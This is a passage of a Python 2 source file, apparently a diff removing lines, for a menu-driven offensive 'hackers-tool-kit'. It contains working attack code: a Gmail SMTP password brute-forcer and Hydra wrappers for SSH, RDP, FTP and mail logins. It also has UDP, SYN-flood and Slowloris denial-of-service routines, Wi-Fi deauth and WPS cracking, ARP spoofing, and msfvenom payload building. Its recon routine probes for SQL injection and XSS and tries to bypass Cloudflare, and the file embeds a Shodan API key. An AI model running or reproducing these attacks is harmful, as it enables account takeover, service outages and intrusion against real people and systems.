( / `-._//^` ' - print ' `Y-.____(__} ' - print ' | {__) ' - print ' () \033[91m V.1.0 ' - - main() - print '\033[0m[1] start the attack' - print '[2] exit' - option = input('==>') - if option == 1: - file_path = raw_input('path of passwords file :') - else: - system('clear') - exit() - pass_file = open(file_path,'r') - pass_list = pass_file.readlines() - def login(): - i = 0 - user_name = raw_input('target email :') - server = smtplib.SMTP_SSL('smtp.gmail.com', 465) - server.ehlo() - for password in pass_list: - i = i + 1 - print str(i) + '/' + str(len(pass_list)) - try: - server.login(user_name, password) - system('clear') - main() - print '\n' - print '[+] This Account Has Been Hacked Password :' + password + ' ^_^' - break - except smtplib.SMTPAuthenticationError as e: - error = str(e) - if error[14] == '<': - system('clear') - main() - print '[+] this account has been hacked, password :' + password + ' ^_^' - - break - else: - print '[!] password not found => ' + password - login() -#--------------------# -#GMAIL BRUTEFORCE END# - -#PORT SCAN START# -#---------------# -def port(): - n = raw_input("Enter Target: ") - os.system("nmap " + n) -#-------------# -#PORT SCAN END# - -#INSTAGRAM BRUTEFORCE START# -#--------------------------# -def insta(): - insta = raw_input("USERNAME> ") - jl = raw_input("WORDLIST> ") - print "\033[1m\033[33m\nMODES>: [0] fastest, [1] fast, [2] slow, [3] slowest\033[0m\n" - k = raw_input("MODE> ") - ma = 'python3 /root/hackers-tool-kit/tools/Instagram/instagram.py {0} {1} -m {2}'.format(insta,jl,k) - os.system(ma) -#------------------------# -#INSTAGRAM BRUTEFORCE END# - -#FACEBOOK BRUTEFORCE START# -#-------------------------# -def fb(): - facebook = raw_input("[EMAIL/ID->]: ") - word = raw_input("[WORDLIST->]: ") - ks = 'cd /root/hackers-tool-kit/tools && perl fb-brute.pl {0} {1}'.format(facebook,word) - os.system(ks) -#-----------------------# -#FACEBOOK BRUTEFORCE END# - -#HOST TO IP START# -#----------------# -def ipgrab(): - b = raw_input(Y+'Enter Host:\033[0m ') - ip = socket.gethostbyname(b) - print G+"------------------------\033[0m" - print N+"Host: ", b - print N+"IP: ", ip - print G+"------------------------\033[0m" -#--------------# -#HOST TO IP END# - -#YOUR OWN IP START# -#-----------------# -def myip(): - gw = os.popen("ip -4 route show default").read().split() - s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) - s.connect((gw[2], 0)) - ipaddr = s.getsockname()[0] - gateway = gw[2] - host = socket.gethostname() - print ("IP: ", ipaddr, " Gateway:", gateway, " Host:", host) - print "\n Router IP" - print "----------------------------\033[92m" - os.system('curl "http://myexternalip.com/raw"') - print "\n\033[0m----------------------------" -#---------------# -#YOUR OWN IP END# - - -#AUTOMATED WIFI HACK START# -#-------------------------# -def wifite(): - os.system("wifite") -#-----------------------# -#AUTOMATED WIFI HACK END# - - -#MONITOR MODE START# -#------------------# -def mon(): - os.system("iwconfig") - i = raw_input("Select Interface: ") - os.system("airmon-ng start " + i) -#----------------# -#MONITOR MODE END# - - -#DEVICES IN THE NET START# -#------------------------# -def netdev(): - os.system("netdiscover") -#----------------------# -#DEVICES IN THE NET END# - - -#NETS AROUND YOU START# -#-----------------------# -def scannet(): - os.system("iwconfig") - m = raw_input("Select Interface: ") - print Y+"WOULD YOU LIKE TO SAVE YOUR SCAN RESULTS?\033[0m" - j = raw_input("[y/n]> ") - if j == "y": - os.system("airodump-ng -w /root/SCAN " + m) - print Y+"! SCAN RESULTS SAVED IN /root/ DIRECTORY !\033[0m" - if j == "n": - os.system("airodump-ng " + m) -#---------------------# -#NETS AROUND YOU END# - - -#INFO SCAN HOST START# -#--------------------# -def info(): - params = [] - # Browser - br = mechanize.Browser() - - # Just some colors and shit - white = '\033[1;97m' - green = '\033[1;32m' - red = '\033[1;31m' - yellow = '\033[1;33m' - end = '\033[1;m' - info = '\033[1;33m[!]\033[1;m' - que = '\033[1;34m[?]\033[1;m' - bad = '\033[1;31m[-]\033[1;m' - good = '\033[1;32m[+]\033[1;m' - run = '\033[1;97m[~]\033[1;m' - - # Cookie Jar - cj = cookielib.LWPCookieJar() - br.set_cookiejar(cj) - - # Browser options - br.set_handle_equiv(True) - br.set_handle_redirect(True) - br.set_handle_referer(True) - br.set_handle_robots(False) - - # Follows refresh 0 but not hangs on refresh > 0 - br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(), max_time=1) - br.addheaders = [ - ('User-agent', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008071615 Fedora/3.0.1-1.fc9 Firefox/3.0.1')] - - - print '''\033[1;31m - _________ __ __ __ - / _____// |________|__| | __ ___________ - \_____ \\\\ __\_ __ \ | |/ // __ \_ __ \\ - / \| | | | \/ | <\ ___/| | \/ - /_______ /|__| |__| |__|__|_ \\\\___ >__| - \/ \/ \/\033[1;m''' - target = raw_input('\033[1;34m[?]\033[1;m Enter the target: ') - if 'http' in target: - parsed_uri = urlparse(target) - domain = '{uri.netloc}'.format(uri=parsed_uri) - else: - domain = target - try: - br.open('http://' + target) - target = 'http://' + target - except: - target = 'https://' + target - - def sqli(url): - print '%s Using SQLMap api to check for SQL injection vulnerabilities. Don\'t worry we are using an online service and it doesn\'t depend on your internet connection. This scan will take 2-3 minutes.' % run - br.open('https://suip.biz/?act=sqlmap') - br.select_form(nr=0) - br.form['url'] = url - req = br.submit() - result = req.read() - match = search(r"---(?s).*---", result) - if match: - print '%s One or more parameters are vulnerable to SQL injection' % good - option = raw_input( - '%s Would you like to see the whole report? [Y/n] ' % que).lower() - if option == 'n': - pass - else: - print '\033[1;31m-\033[1;m' * 40 - print match.group().split('---')[1][:-3] - print '\033[1;31m-\033[1;m' * 40 - else: - print '%s None of parameters is vulnerable to SQL injection' % bad - - - def cms(domain): - try: - result = br.open('https://whatcms.org/?s=' + domain).read() - detect = search(r'class="nowrap" title="[^<]*">', result) - WordPress = False - try: - r = br.open(target + '/robots.txt').read() - if "wp-admin" in str(r): - WordPress = True - except: - pass - if detect: - print '%s CMS Detected : %s' % (info, detect.group().split('class="nowrap" title="')[1][:-2]) - detect = detect.group().split('">')[1][:-27] - if 'WordPress' in detect: - option = raw_input( - '%s Would you like to use WPScan? [Y/n] ' % que).lower() - if option == 'n': - pass - else: - os.system('wpscan --random-agent --url %s' % domain) - elif WordPress: - print '%s CMS Detected : WordPress' % info - option = raw_input( - '%s Would you like to use WPScan? [Y/n] ' % que).lower() - if option == 'n': - pass - else: - os.system('wpscan --random-agent --url %s' % domain) - else: - print '%s %s doesn\'t seem to use a CMS' % (info, domain) - except: - pass - - def honeypot(ip_addr): - result = {"0.0": 0, "0.1": 10, "0.2": 20, "0.3": 30, "0.4": 40, "0.5": 50, "0.6": 60, "0.7": 70, "0.8": 80, "0.9": 90, "1.0": 10} - honey = 'https://api.shodan.io/labs/honeyscore/%s?key=C23OXE0bVMrul2YeqcL7zxb6jZ4pj2by' % ip_addr - try: - phoney = br.open(honey).read() - if float(phoney) >= 0.0 and float(phoney) <= 0.4: - what = good - else: - what = bad - print '{} Honeypot Probabilty: {}%'.format(what, result[phoney]) - except KeyError: - print '\033[1;31m[-]\033[1;m Honeypot prediction failed' - - def whoisIt(url): - who = "" - print '{} Trying to gather whois information for {}'.format(run,url) - try: - who = str(whois.whois(url)).decode() - except Exception: - pass - test = who.lower() - if "whoisguard" in test or "protection" in test or "protected" in test: - print '{} Whois Protection Enabled{}'.format(bad, end) - else: - print '{} Whois information found{}'.format(good, end) - try: - data = json.loads(who) - for key in data.keys(): - print "{} :".format(key.replace("_", " ").title()), - if type(data[key]) == list: - print ", ".join(data[key]) - else: - print "{}".format(data[key]) - except ValueError: - print '{} Unable to build response, visit https://who.is/whois/{} {}'.format(bad, url, end) - pass - - def nmap(ip_addr): - port = 'http://api.hackertarget.com/nmap/?q=' + ip_addr - result = br.open(port).read() - result = sub(r'Starting[^<]*\)\.', '', result) - result = sub(r'Service[^<]*seconds', '', result) - result = os.linesep.join([s for s in result.splitlines() if s]) - print result - - def bypass(domain): - post = urlencode({'cfS': domain}) - result = br.open( - 'http://www.crimeflare.info/cgi-bin/cfsearch.cgi ', post).read() - - match = search(r' \b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\b', result) - if match: - bypass.ip_addr = match.group().split(' ')[1][:-1] - print '%s Real IP Address : %s' % (good, bypass.ip_addr) - - def dnsdump(domain): - res = DNSDumpsterAPI(False).search(domain) - print '\n%s DNS Records' % good - for entry in res['dns_records']['dns']: - print '{domain} ({ip}) {as} {provider} {country}'.format(**entry) - for entry in res['dns_records']['mx']: - print '\n%s MX Records' % good - print '{domain} ({ip}) {as} {provider} {country}'.format(**entry) - print '\n\033[1;32m[+]\033[1;m Host Records (A)' - for entry in res['dns_records']['host']: - if entry['reverse_dns']: - print '{domain} ({reverse_dns}) ({ip}) {as} {provider} {country}'.format(**entry) - else: - print '{domain} ({ip}) {as} {provider} {country}'.format(**entry) - print '\n%s TXT Records' % good - for entry in res['dns_records']['txt']: - print entry - print '\n%s DNS Map: https://dnsdumpster.com/static/map/%s.png\n' % (good, domain.strip('www.')) - - - def fingerprint(ip_addr): - try: - result = br.open('https://www.censys.io/ipv4/%s/raw' % ip_addr).read() - match = search(r'"os_description": "[^<]*"', result) - if match: - print '%s Operating System : %s' % (good, match.group().split('n": "')[1][:-5]) - except: - pass - - - ip_addr = socket.gethostbyname(domain) - print '%s IP Address : %s' % (info, ip_addr) - try: - r = requests.get(target) - header = r.headers['Server'] - if 'cloudflare' in header: - print '%s Cloudflare detected' % bad - bypass(domain) - try: - ip_addr = bypass.ip_addr - except: - pass - else: - print '%s Server: %s' % (info, header) - try: - print '%s Powered By: %s' % (info, r.headers['X-Powered-By']) - except: - pass - try: - r.headers['X-Frame-Options'] - except: - print '%s Clickjacking protection is not in place.' % good - except: - pass - fingerprint(ip_addr) - cms(domain) - try: - honeypot(ip_addr) - except: - pass - print "{}----------------------------------------{}".format(red, end) - whoisIt(domain) - try: - r = br.open(target + '/robots.txt').read() - print '\033[1;31m-\033[1;m' * 40 - print '%s Robots.txt retrieved\n' % good, r - except: - pass - print '\033[1;31m-\033[1;m' * 40 - nmap(ip_addr) - print '\033[1;31m-\033[1;m' * 40 - dnsdump(domain) - os.system('cd plugins && python theHarvester.py -d %s -b all' % domain) - try: - br.open(target) - print '%s Crawling the target for fuzzable URLs' % run - for link in br.links(): - if 'http' in link.url or '=' not in link.url: - pass - else: - url = target + '/' + link.url - params.append(url) - if len(params) == 0: - print '%s No fuzzable URLs found' % bad - quit() - print '%s Found %i fuzzable URLs' % (good, len(params)) - for url in params: - print url - sqli(url) - url = url.replace('=', '') - r = br.open(url).read() - if '' in r: - print '%s One or more parameters are vulnerable to XSS' % good - break - print '%s These are the URLs having parameters:' % good - for url in params: - print url - except: - pass -#------------------# -#INFO SCAN HOST END# - - -#INFO ON YOUR SYSTEM START# -#-------------------------# -def sysinfo(): - os.system("iwconfig") - k = raw_input("Interface: ") - os.system("clear") - os.system("ifconfig") - print "\n" - os.system("iwconfig") - print "\n" - os.system("neofetch") - print "\n" - gw = os.popen("ip -4 route show default").read().split() - s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) - s.connect((gw[2], 0)) - ipaddr = s.getsockname()[0] - gateway = gw[2] - host = socket.gethostname() - print (" IP: ", ipaddr, " Gateway: ", gateway, " Host: ", host) - print "\n Router IP" - print "----------------------------\033[92m" - os.system('curl "http://myexternalip.com/raw"') - print "\n\033[0m----------------------------" - print "\n" - show = 'macchanger -s {0}'.format(k) - os.system(show) -#-----------------------# -#INFO ON YOUR SYSTEM END# - - -#ALL METASPLOIT EXPLOITS START# -#-----------------------------# -def msfex(): - os.system("service postgresql start") - os.system("""msfconsole -x 'show exploits'""") -#---------------------------# -#ALL METASPLOIT EXPLOITS END# - - -#UDP DOS START# -#-------------# -def udp(): - target = raw_input(N+"Target:\033[91m ") - ip = socket.gethostbyname(target) - port = input(N+"Port:\033[91m ") - os.system("service tor restart") - print N+"udp attack started on {0}.{1} | {2}-{3}-{4}".format(hour, minute, day, month, year) - os.system("sleep 2s") - sent = 0 - print "KILLING %s CONNECTIONS"%(ip) - while True: - sock.sendto(Gb, (ip,port)) - sock.sendto(bytes, (ip,port)) - sock.sendto(Kb, (ip,port)) - sent = sent + 1 - port = port + 1 - print B+"|+| Slapping \033[0m|\033[31m %s \033[0m| Port |\033[31m %s \033[0m| Bytes |\033[31m %s \033[0m|"%(ip,port,sent) - if port == 65534: - port = 1 -#-----------# -#UDP DOS END# - -#TCP FLOOD START# -#---------------# -def tcp(): - print Y+"-p = port | -t = threads | Example: tcp 95.52.541.1 -p 80 -t 600\033[0m" - print "\n" - tcp = raw_input(Y+"[\033[92m+\033[91m-\033[0mTCP\033[91m-\033[92m+\033[93m]\033[0m ") - print R+"IF YOU GET SPAMMED WITH ERRORS BUT ITS STILL RUNNING ITS FINE\033[0m" - os.system("sleep 5") - os.system("python /root/hackers-tool-kit/tools/" + tcp) -#-------------# -#TCP FLOOD END# - - -#SYN FLOOD START# -#---------------# -def syn(): - def randomIP(): - ip = ".".join(map(str, (random.randint(0,255)for _ in range(4)))) - return ip - - def randInt(): - x = random.randint(1000,9000) - return x - - def SYN_Flood(dstIP,dstPort,counter): - total = 0 - print "Packets are sending ..." - for x in range (0,counter): - s_port = randInt() - s_eq = randInt() - w_indow = randInt() - - IP_Packet = IP () - IP_Packet.src = randomIP() - IP_Packet.dst = dstIP - - TCP_Packet = TCP () - TCP_Packet.sport = s_port - TCP_Packet.dport = dstPort - TCP_Packet.flags = "S" - TCP_Packet.seq = s_eq - TCP_Packet.window = w_indow - - send(IP_Packet/TCP_Packet, verbose=0) - total+=1 - sys.stdout.write("\nTotal packets sent: %i\n" % total) - - - def info(): - - dstIP = raw_input ("\nTarget IP : ") - dstPort = input ("Target Port : ") - - return dstIP,int(dstPort) - - - def main(): - dstIP,dstPort = info() - counter = input ("Packets : ") - SYN_Flood(dstIP,dstPort,int(counter)) - - main() -#-------------# -#SYN FLOOD END# - - -#PING A HOST START# -#-----------------# -def ping(): - p = raw_input("Enter Host: ") - os.system("ping " + p) -#---------------# -#PING A HOST END# - - -#ALL METASPLOIT PAYLOADS START# -#-----------------------------# -def msfpa(): - os.system("service postgresql start") - os.system("""msfconsole -x 'show payloads'""") -#---------------------------# -#ALL METASPLOIT PAYLOADS END# - - -#ALL METASPLOIT AUX START# -#------------------------# -def msfau(): - os.system("service postgresql start") - os.system("""msfconsole -x 'show auxiliary'""") -#----------------------# -#ALL METASPLOIT AUX END# - - -#START METASPLOIT HANDLER START# -#------------------------------# -def multih(): - os.system("service postgresql start") - os.system("""msfconsole -x 'use multi/handler'""") -#----------------------------# -#START METASPLOIT HANDLER END# - - -#ALL METASPLOIT MODS START# -#-------------------------# -def msfall(): - os.system("service postgresql start") - os.sytem("""msfconsole -x 'show all'""") -#-----------------------# -#ALL METASPLOIT MODS END# - - -#HYDRA AUTOMATED START# -#---------------------# -def hydra(): - """ - This program is just a small program to shorten brute force sessions on hydra :) - But to be more satisfying results of the brute force. You better interact directly with hydra, - without having to use this black hydra console first: '). - If you find any errors in running our program. Can chat via facebook :). - Hydra is needed for the process of this program :). - """ - import sys, os, time - - # Restart #################### - def restart_program(): - python = sys.executable - os.execl(python, python, * sys.argv) - curdir = os.getcwd() - ############################## - - os.system("clear") - print B+"___ _ ____ ____ _ _ _ _ _ _ ___ ____ ____" - print "|__] | |__| | |_/ |__| \_/ | \ |__/ |__|" - print "|__] |___ | | |___ | \_ | | | |__/ | \ | |" - print G+"-----------------------------------------------------" - print N+"[]xxxxx[]::::::::::::::::::::> 24-07-2017 (7:53)" - print R+" [*] Author: DedSecTL --- [*] Version 1.0" - print N+"c=={:::::::::::::::> Black Hydra Console" - print R+" [*] My FB : https://m.facebook.com/100004136748473" - print N+"(}xxx{):::::::::> AndroSec1337 Cyber Team" - print - print " ===|[ Brute Force ]|===" - print - print " [01] Cisco Brute Force " - print " [02] VNC Brute Force " - print " [03] FTP Brute Force " - print " [04] Gmail Brute Force " - print " [05] SSH Brute Force " - print " [06] TeamSpeak Brute Force " - print " [07] Telnet Brute Force " - print " [08] Yahoo Mail Brute Force " - print " [09] Hotmail Brute Force " - print " [10] Router Speedy Brute Force " - print " [11] RDP Brute Force " - print " [12] MySQL Brute Force " - print - print " [00] Exit" - print - bhydra = raw_input("[*] B-Hydra > ") - - if bhydra == '01' or bhydra == '1': - print - print " +---------------------------+" - print " | Cisco Brute Force |" - print " +---------------------------+" - print - print - iphost = raw_input("[*] IP/Hostname : ") - word = raw_input("[*] Wordlist : ") - os.system("hydra -P %s %s cisco" % (word, iphost)) - sys.exit() - - elif bhydra == '02' or bhydra == '2': - print - print " +---------------------------+" - print " | VNC Brute Force |" - print " +---------------------------+" - print - print - word = raw_input("[*] Wordlist : ") - iphost = raw_input("[*] IP/Hostname : ") - os.system("hydra -P %s -e n -t 1 %s vnc -V" % (word, iphost)) - iphost = raw_input("[*] IP/Hostname : ") - - elif bhydra == '03' or bhydra == '3': - print - print " +------------------------------+" - print " | FTP Brute Force |" - print " +------------------------------+" - print - print - user = raw_input("[*] User : ") - iphost = raw_input("[*] IP/Hostname : ") - word = raw_input("[*] Wordlist : ") - os.system("hydra -l %s -P %s %s ftp" % (user, word, iphost)) - sys.exit() - - elif bhydra == '04' or bhydra == '4': - print - print " +------------------------------+" - print " | Gmail Brute Force |" - print " +------------------------------+" - print - print - email = raw_input("[*] Email : ") - word = raw_input("[*] Wordlist : ") - os.system("hydra -l %s -P %s -s 465 smtp.gmail.com smtp" % (email, word)) - sys.exit() - - elif bhydra == '05' or bhydra == '5': - print - print " +--------------------------------+" - print " | SSH Brute Force |" - print " +--------------------------------+" - print - print - user = raw_input("[*] User : ") - word = raw_input("[*] Wordlist : ") - iphost = raw_input("[*] IP/Hostname : ") - os.system("hydra -l %s -P %s %s ssh" % (user, word, iphost)) - sys.exit() - - elif bhydra == '06' or bhydra == '6': - print - print " +-------------------------+" - print " | TeamSpeak Brute Force |" - print " +-------------------------+" - print - print - user = raw_input("[*] User : ") - word = raw_input("[*] Wordlist : ") - iphost = raw_input("[*] IP/Hostname : ") - os.system("hydra -l %s -P %s -s 8676 %s teamspeak" % (user, word, iphost)) - sys.exit() - - elif bhydra == '07' or bhydra == '7': - print - print " +-------------------------+" - print " | Telnet Brute Force |" - print " +-------------------------+" - print - print - user = raw_input("[*] User : ") - word = raw_input("[*] Wordlist : ") - iphost = raw_input("[*] IP/Hostname : ") - os.system("hydra -l %s -P %s %s telnet" % (user, word, iphost)) - sys.exit() - - elif bhydra == '08' or bhydra == '8': - print - print " +---------------------------+" - print " | Yahoo Brute Force |" - print " +---------------------------+" - print - print - email = raw_input("[*] Email : ") - word = raw_input("[*] Wordlist : ") - os.system("hydra -l %s -P %s -s 587 smtp.mail.yahoo.com smtp" % (email, word)) - sys.exit() - - elif bhydra == '09' or bhydra == '9': - print - print " +----------------------------+" - print " | Hotmail Brute Force |" - print " +----------------------------+" - print - print - email = raw_input("[*] Email : ") - word = raw_input("[*] Wordlist : ") - os.system("hydra -l %s -P %s -s 587 smtp.live.com smtp" % (email, word)) - sys.exit() - - elif bhydra == '10': - print - print " +-----------------------------+" - print " | Router Speedy Brute Force |" - print " +-----------------------------+" - print - print - user = raw_input("[*] User : ") - word = raw_input("[*] Wordlist : ") - iphost = raw_input("[*] IP/Hostname : ") - os.system("hydra -m / -l %s -P %s %s http-get" % (user, word, iphost)) - sys.exit() - - elif bhydra == '11': - print - print " +----------------------------+" - print " | RDP Brute Force |" - print " +----------------------------+" - print - print - user = raw_input("[*] User : ") - word = raw_input("[*] Wordlist : ") - iphost = raw_input("[*] IP/Hostname : ") - os.system("hydra -t 1 -V -f -l %s -P %s %s rdp" % (user, word, iphost)) - sys.exit() - - elif bhydra == '12': - print - print " +-----------------------------+" - print " | MySQL Brute Force |" - print " +-----------------------------+" - print - print - user = raw_input("[*] User : ") - word = raw_input("[*] Wordlist : ") - os.system("hydra -t 5 -V -f -l %s -e ns -P %s localhost mysql" % (user, word)) - - elif bhydra == '00' or bhydra == '0': - print "\n[!] Exit the Program..." - sys.exit() - - else: - print "\n[!] ERROR : Wrong Input" - time.sleep(1) - restart_program() -#-------------------# -#HYDRA AUTOMATED END# - - -#WORDLIST MAKER START# -#--------------------# -def cupp(): - os.system("cd /root/hackers-tool-kit/wordlists && cupp -i") - print Y+"wordlist saved to /root/hackers-tool-kit/wordlists\033[0m" -#------------------# -#WORDLIST MAKER END# - - -#LIST FILES START# -#----------------# -def vdir(): - print "\n" - os.system("ls") - print Y+"! doesnt have to be these can be any directory !\033[0m" - print "\n" - h = raw_input("Directory Path: ") - print "\n" - print "--------------------------------------------------------------------------------------------------------------------------------------------" - os.system("ls " + h) - print "--------------------------------------------------------------------------------------------------------------------------------------------" -#--------------# -#LIST FILES END# - - -#MONITOR MODE OFF START# -#----------------------# -def monoff(): - os.system("iwconfig") - i = raw_input("Select Interface: ") - os.system("airmon-ng stop " + i) -#--------------------# -#MONITOR MODE OFF END# - - -#TURN ON VPN START# -#-----------------# -def vpn(): - os.system("anonsurf start") - os.system("anonsurf myip") -#---------------# -#TURN ON VPN END# - - -#TURN OFF VPN START# -#------------------# -def vpnoff(): - os.system("anonsurf stop") - os.system("anonsurf myip") -#----------------# -#TURN OFF VPN END# - - -#SLOW LORIS DOS START# -#--------------------# -def slowl(): - de = raw_input("Delay: ") - tar = raw_input("RHOST: ") - port = raw_input("RPORT: ") - soc = raw_input("Sockets: ") - os.system('echo "use auxiliary/dos/http/slowloris\n" > slowl.rc') - os.system('echo "set delay {0}\n" >> slowl.rc'.format(de)) - os.system('echo "set RHOST {0}\n" >> slowl.rc'.format(tar)) - os.system('echo "set RPORT {0}\n" >> slowl.rc'.format(port)) - os.system('echo "set sockets {0}\n" >> slowl.rc'.format(soc)) - os.system('echo "run\n" >> slowl.rc') - os.system('msfconsole -r slowl.rc') - os.system('rm -rf slowl.rc') -#------------------# -#SLOW LORIS DOS END# - - -#OPEN DOX WEBSITE START# -#----------------------# -def pidox(): - print Y+"! USING FIREFOX !\033[0m" - os.system("sleep 2") - os.system("firefox https://pipl.com/") -#--------------------# -#OPEN DOX WEBSITE END# - - -#SCAN SPECIFIC NET START# -#-----------------------# -def specnet(): - jk = raw_input("BSSID: ") - kj = raw_input("ESSID: ") - os.system("iwconfig") - k = raw_input("INTERFACE: ") - print Y+"WOULD YOU LIKE TO SAVE YOUR SCAN RESULTS?\033[0m" - j = raw_input("[y/n]> ") - if j == "y": - a = 'airodump-ng -w /root/SCAN --bssid {0} --essid {1} {2}'.format(jk,kj,k) - os.system(a) - if j == "n": - a = 'airodump-ng --bssid {0} --essid {1} {2}'.format(jk,kj,k) - os.system(a) -#---------------------# -#SCAN SPECIFIC NET END# - - -#DEFAULT WIFI PIN START# -#----------------------# -def pingen(): - j = raw_input("Enter BSSID: ") - a = 'cd /root/hackers-tool-kit/tools && python pingen.py {0}'.format(j) - os.system(a) -#--------------------# -#DEFAULT WIFI PIN END# - - -#WIFI PIN BRUTEFORCE START# -#-------------------------# -def reaver(): - os.system("iwconfig") - j = raw_input("Select Interface: ") - k = raw_input("Enter BSSID: ") - a = 'reaver -i {0} -b {1} -vv'.format(j,k) - os.system(a) -#-----------------------# -#WIFI PIN BRUTEFORCE END# - - -#DEAUTH ATTACK START# -#-------------------# -def deauth(): - print Y+"! YOU MAY HAVE TO CHANGE YOUR WIFI CHANNEL !\033[0m" - j = raw_input("Enter BSSID> ") - os.system("iwconfig") - k = raw_input("Enter Interface> ") - a = 'aireplay-ng -0 0 -a {0} {1}'.format(j,k) - os.system(a) -#-----------------# -#DEAUTH ATTACK END# - - -#MAC CHANGER START# -#-----------------# -def macc(): - os.system("iwconfig") - k = raw_input("Interface: ") - c = 'ifconfig {0} down'.format(k) - os.system(c) - os.system("macchanger -r " + k) - s = 'ifconfig {0} up'.format(k) - os.system(s) -#-----------------# -#MAC CHANGER START# - - -#MAC CHANGER OFF START# -#---------------------# -def macoff(): - os.system("iwconfig") - k = raw_input("Interface: ") - c = 'ifconfig {0} down'.format(k) - os.system(c) - os.system("macchanger -p " + k) - s = 'ifconfig {0} up'.format(k) - os.system(s) -#-------------------# -#MAC CHANGER OFF END# - - -#ARP SPOOF START# -#---------------# -def arpspoof(): - print "\033[93mif using multiple targets heres an example: 134.143.1.3, 134.143.1.6\033[0m\n" - h = raw_input("Targets: ") - os.system('echo "net.sniff on\n" >> arp.cap') - os.system('echo "set arp.spoof.targets {0}\n" >> arp.cap'.format(h)) - os.system('echo "arp.spoof on\n" >> arp.cap') - print '\n\033[93mto stop type "exit"\033[0m' - os.system("sleep 2") - os.system("bettercap -no-history -caplet arp.cap") - os.system("rm arp.cap") -#-------------# -#ARP SPOOF END# - - -#SSL SCAN START# -#--------------# -def sslscan(): - j = raw_input('Enter Target: ') - a = 'sslscan {0}'.format(j) - os.system(a) -#------------# -#SSL SCAN END# - - -#MAKE A PAYLOAD START# -#--------------------# -def payload(): - os.system("cat /root/hackers-tool-kit/tools/payloads.txt") - print "\n" - f = raw_input("Select Payload: ") - l = raw_input("LHOST: ") - c = raw_input("LPORT: ") - print "\nExamples: py, php, exe\n" - s = raw_input("File Format: ") - h = raw_input("File Name: ") - a = 'msfvenom -p {0} LHOST={1} LPORT={2} -o /root/{3}.{4}'.format(f,l,c,h,s) - os.system(a) -#------------------# -#MAKE A PAYLOAD END# - - -#WORDLIST MAKER START# -#--------------------# -def crunch(): - print "minimal number of characters" - j = raw_input("[CRUNCH]: ") - print "maximum number of characters" - k = raw_input("[CRUNCH]: ") - print "what characters should be in it" - b = raw_input("[CRUNCH]: ") - print "name of file" - s = raw_input("[CRUNCH]: ") - a = 'crunch {0} {1} {2} -o /root/hackers-tool-kit/wordlists/{3}'.format(j,k,b,s) - os.system(a) - print Y+"wordlist saved to \033[0m/root/hackers-tool-kit/wordlists/" + s -#------------------# -#WORDLIST MAKER END# - - -#INTERNET TRAFFIC START# -#----------------------# -def traff(): - os.system("iwconfig") - s = raw_input("Select Interface: ") - os.system("tcpdump -i " + s) -#--------------------# -#INTERNET TRAFFIC END# - - -#RESET ACCOUNT PASSWORD START# -#----------------------------# -def resa(): - j = raw_input("USERNAME: ") - k = raw_input("NEW PASSWORD: ") - print "are you sure?" - q = raw_input("[y/n]: ") - if q == "n": - os.system("clear") - mainbanner() - if q == "y": - a = 'echo "{0}:{1}" | chpasswd'.format(j,k) - print "password for {0} has been reset".format(j) -#--------------------------# -#RESET ACCOUNT PASSWORD END# - - -#RESET UNIX PASSWORD START# -#-------------------------# -def resu(): - j = raw_input("PASSWORD: ") - print "are you sure?" - q = raw_input("[y/n]: ") - if q == "n": - os.system("clear") - mainbanner() - if q == "y": - a = 'passwd {0}'.format(j) - print "unix password has been reset".format(j) -#-----------------------# -#RESET UNIX PASSWORD END# - - -#FIND HASH TYPE START# -#--------------------# -def hashid(): - #!/usr/bin/python - # encoding: utf-8 - # Hash Identifier v1.1 - # By Zion3R - # www.Blackploit.com - # Root@Blackploit.com - - logo=''' ######################################################################### - # __ __ __ ______ _____ # - # /\ \/\ \ /\ \ /\__ _\ /\ _ `\ # - # \ \ \_\ \ __ ____ \ \ \___ \/_/\ \/ \ \ \/\ \ # - # \ \ _ \ /'__`\ / ,__\ \ \ _ `\ \ \ \ \ \ \ \ \ # - # \ \ \ \ \/\ \_\ \_/\__, `\ \ \ \ \ \ \_\ \__ \ \ \_\ \ # - # \ \_\ \_\ \___ \_\/\____/ \ \_\ \_\ /\_____\ \ \____/ # - # \/_/\/_/\/__/\/_/\/___/ \/_/\/_/ \/_____/ \/___/ v1.1 # - # By Zion3R # - # www.Blackploit.com # - # Root@Blackploit.com # - #########################################################################''' - - algorithms={"102020":"ADLER-32", "102040":"CRC-32", "102060":"CRC-32B", "101020":"CRC-16", "101040":"CRC-16-CCITT", "104020":"DES(Unix)", "101060":"FCS-16", "103040":"GHash-32-3", "103020":"GHash-32-5", "115060":"GOST R 34.11-94", "109100":"Haval-160", "109200":"Haval-160(HMAC)", "110040":"Haval-192", "110080":"Haval-192(HMAC)", "114040":"Haval-224", "114080":"Haval-224(HMAC)", "115040":"Haval-256", "115140":"Haval-256(HMAC)", "107080":"Lineage II C4", "106025":"Domain Cached Credentials - MD4(MD4(($pass)).(strtolower($username)))", "102080":"XOR-32", "105060":"MD5(Half)", "105040":"MD5(Middle)", "105020":"MySQL", "107040":"MD5(phpBB3)", "107060":"MD5(Unix)", "107020":"MD5(Wordpress)", "108020":"MD5(APR)", "106160":"Haval-128", "106165":"Haval-128(HMAC)", "106060":"MD2", "106120":"MD2(HMAC)", "106040":"MD4", "106100":"MD4(HMAC)", "106020":"MD5", "106080":"MD5(HMAC)", "106140":"MD5(HMAC(Wordpress))", "106029":"NTLM", "106027":"RAdmin v2.x", "106180":"RipeMD-128", "106185":"RipeMD-128(HMAC)", "106200":"SNEFRU-128", "106205":"SNEFRU-128(HMAC)", "106220":"Tiger-128", "106225":"Tiger-128(HMAC)", "106240":"md5($pass.$salt)", "106260":"md5($salt.'-'.md5($pass))", "106280":"md5($salt.$pass)", "106300":"md5($salt.$pass.$salt)", "106320":"md5($salt.$pass.$username)", "106340":"md5($salt.md5($pass))", "106360":"md5($salt.md5($pass).$salt)", "106380":"md5($salt.md5($pass.$salt))", "106400":"md5($salt.md5($salt.$pass))", "106420":"md5($salt.md5(md5($pass).$salt))", "106440":"md5($username.0.$pass)", "106460":"md5($username.LF.$pass)", "106480":"md5($username.md5($pass).$salt)", "106500":"md5(md5($pass))", "106520":"md5(md5($pass).$salt)", "106540":"md5(md5($pass).md5($salt))", "106560":"md5(md5($salt).$pass)", "106580":"md5(md5($salt).md5($pass))", "106600":"md5(md5($username.$pass).$salt)", "106620":"md5(md5(md5($pass)))", 